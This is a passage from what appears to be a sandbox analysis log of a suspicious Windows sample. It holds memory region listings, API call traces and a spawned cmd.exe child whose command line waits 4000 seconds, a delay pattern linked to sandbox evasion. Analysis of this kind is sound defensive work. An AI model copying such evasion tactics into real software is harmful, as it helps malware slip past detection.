[155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0269.890] ResumeThread (hThread=0x178) returned 0x1
[0269.932] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0269.932] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0269.932] GlobalUnlock (hMem=0x95000c) returned 0
[0269.932] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0269.932] GlobalUnlock (hMem=0x950004) returned 0
[0269.940] Sleep (dwMilliseconds=0xe74e)
Process:
id = "26"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x7f1be3a0"
os_pid = "0xf24"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /k echo %time% && timeout 4000 > NUL && exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2281
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2282
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2283
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2284
start_va = 0xf0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2285
start_va = 0x4a720000
end_va = 0x4a76bfff
entry_point = 0x4a720000
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 2286
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2287
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2288
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2289
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 2290
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2326
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2327
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2328
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2329
start_va = 0x250000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2330
start_va = 0x4e0000
end_va = 0x4effff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 2331
start_va = 0x6cdf0000
end_va = 0x6cdf6fff
entry_point = 0x6cdf0000
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2332
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2333
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2334
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2335
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2336
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2337
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2338
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2339
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2340
start_va = 0x350000
end_va = 0x417fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000350000"
filename = ""
Region:
id = 2341
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2342
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2343
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2344
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2345
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2346
start_va = 0x1f0000
end_va = 0x1f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2347
start_va = 0x4f0000
end_va = 0x5f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004f0000"
filename = ""
Region:
id = 2348
start_va = 0x600000
end_va = 0x11fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 2349
start_va = 0x1200000
end_va = 0x1362fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001200000"
filename = ""
Thread:
id = 221
os_tid = 0xf28
[0085.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb3c | out: lpSystemTimeAsFileTime=0x1efb3c*(dwLowDateTime=0xe3744010, dwHighDateTime=0x1d469c7))
[0085.485] GetCurrentProcessId () returned 0xf24
[0085.485] GetCurrentThreadId () returned 0xf28
[0085.485] GetTickCount () returned 0x232a3
[0085.485] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb34 | out: lpPerformanceCount=0x1efb34*=1815943000000) returned 1
[0085.485] GetModuleHandleA (lpModuleName=0x0) returned 0x4a720000
[0085.486] __set_app_type (_Type=0x1)
[0085.486] __p__fmode () returned 0x757a31f4
[0085.486] __p__commode () returned 0x757a31fc
[0085.486] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7421a6) returned 0x0
[0085.486] __getmainargs (in: _Argc=0x4a744238, _Argv=0x4a744240, _Env=0x4a74423c, _DoWildCard=0, _StartInfo=0x4a744140 | out: _Argc=0x4a744238, _Argv=0x4a744240, _Env=0x4a74423c) returned 0
[0085.486] GetCurrentThreadId () returned 0xf28
[0085.486] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf28) returned 0x38
[0085.486] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75370000
[0085.487] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0085.487] SetThreadUILanguage (LangId=0x0) returned 0x409
[0085.487] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0085.487] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efacc | out: phkResult=0x1efacc*=0x0) returned 0x2
[0085.487] VirtualQuery (in: lpAddress=0x1efb03, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0085.487] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
[0085.487] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
[0085.487] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0085.487] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa9c, dwLength=0x1c | out: lpBuffer=0x1efa9c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0085.487] GetConsoleOutputCP () returned 0x1b5
[0085.487] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a744260 | out: lpCPInfo=0x4a744260) returned 1
[0085.487] SetConsoleCtrlHandler (HandlerRoutine=0x4a73e72a, Add=1) returned 1
[0085.488] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.488] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
[0085.488] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.488] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7441ac | out: lpMode=0x4a7441ac) returned 1
[0085.488] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.488] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0085.488] _get_osfhandle (_FileHandle=0) returned 0x3
[0085.488] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7441b0 | out: lpMode=0x4a7441b0) returned 1
[0085.489] _get_osfhandle (_FileHandle=0) returned 0x3
[0085.489] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0085.489] GetEnvironmentStringsW () returned 0x260108*
[0085.489] FreeEnvironmentStringsW (penv=0x260108) returned 1
[0085.489] GetEnvironmentStringsW () returned 0x260108*
[0085.489] FreeEnvironmentStringsW (penv=0x260108) returned 1
[0085.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea3c | out: phkResult=0x1eea3c*=0x40) returned 0x0
[0085.489] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x1000) returned 0x2
[0085.489] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x1000) returned 0x2
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x1000) returned 0x2
[0085.490] RegCloseKey (hKey=0x40) returned 0x0
[0085.490] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea3c | out: phkResult=0x1eea3c*=0x40) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x40, lpcbData=0x1eea40*=0x1000) returned 0x2
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x1, lpcbData=0x1eea40*=0x1000) returned 0x2
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x0, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x4, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x4) returned 0x0
[0085.490] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea44, lpData=0x1eea48, lpcbData=0x1eea40*=0x1000 | out: lpType=0x1eea44*=0x0, lpData=0x1eea48*=0x9, lpcbData=0x1eea40*=0x1000) returned 0x2
[0085.490] RegCloseKey (hKey=0x40) returned 0x0
[0085.490] time (in: timer=0x0 | out: timer=0x0) returned 0x5bcd5fb1
[0085.490] srand (_Seed=0x5bcd5fb1)
[0085.490] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k echo %time% && timeout 4000 > NUL && exit"
[0085.491] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /k echo %time% && timeout 4000 > NUL && exit"
[0085.491] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a745260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0085.491] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261940, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
[0085.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
[0085.491] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0085.491] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
[0085.491] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0085.492] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a750640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0085.492] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
[0085.492] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
[0085.492] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
[0085.492] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
[0085.492] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
[0085.492] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
[0085.492] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
[0085.492] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
[0085.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef808 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0085.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1ef808, lpFilePart=0x1ef804 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef804*="system32") returned 0x13
[0085.492] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
[0085.492] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x261b50
[0085.492] FindClose (in: hFindFile=0x261b50 | out: hFindFile=0x261b50) returned 1
[0085.493] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1ef584 | out: lpFindFileData=0x1ef584) returned 0x261b50
[0085.493] FindClose (in: hFindFile=0x261b50 | out: hFindFile=0x261b50) returned 1
[0085.493] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
[0085.493] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
[0085.493] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
[0085.493] GetEnvironmentStringsW () returned 0x260108*
[0085.493] FreeEnvironmentStringsW (penv=0x260108) returned 1
[0085.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a745260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0085.494] GetConsoleOutputCP () returned 0x1b5
[0085.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a744260 | out: lpCPInfo=0x4a744260) returned 1
[0085.494] GetUserDefaultLCID () returned 0x409
[0085.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a744950, cchData=8 | out: lpLCData=":") returned 2
[0085.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef948, cchData=128 | out: lpLCData="0") returned 2
[0085.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef948, cchData=128 | out: lpLCData="0") returned 2
[0085.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef948, cchData=128 | out: lpLCData="1") returned 2
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a744940, cchData=8 | out: lpLCData="/") returned 2
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a744d80, cchData=32 | out: lpLCData="Mon") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a744d40, cchData=32 | out: lpLCData="Tue") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a744d00, cchData=32 | out: lpLCData="Wed") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a744cc0, cchData=32 | out: lpLCData="Thu") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a744c80, cchData=32 | out: lpLCData="Fri") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a744c40, cchData=32 | out: lpLCData="Sat") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a744c00, cchData=32 | out: lpLCData="Sun") returned 4
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a744930, cchData=8 | out: lpLCData=".") returned 2
[0085.577] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a744920, cchData=8 | out: lpLCData=",") returned 2
[0085.577] setlocale (category=0, locale=".OCP") returned="English_United States.437"
[0085.578] GetConsoleTitleW (in: lpConsoleTitle=0x260170, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0085.579] _get_osfhandle (_FileHandle=1) returned 0x7
[0085.579] GetFileType (hFile=0x7) returned 0x2
[0085.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0085.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1efa44 | out: lpMode=0x1efa44) returned 1
[0085.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
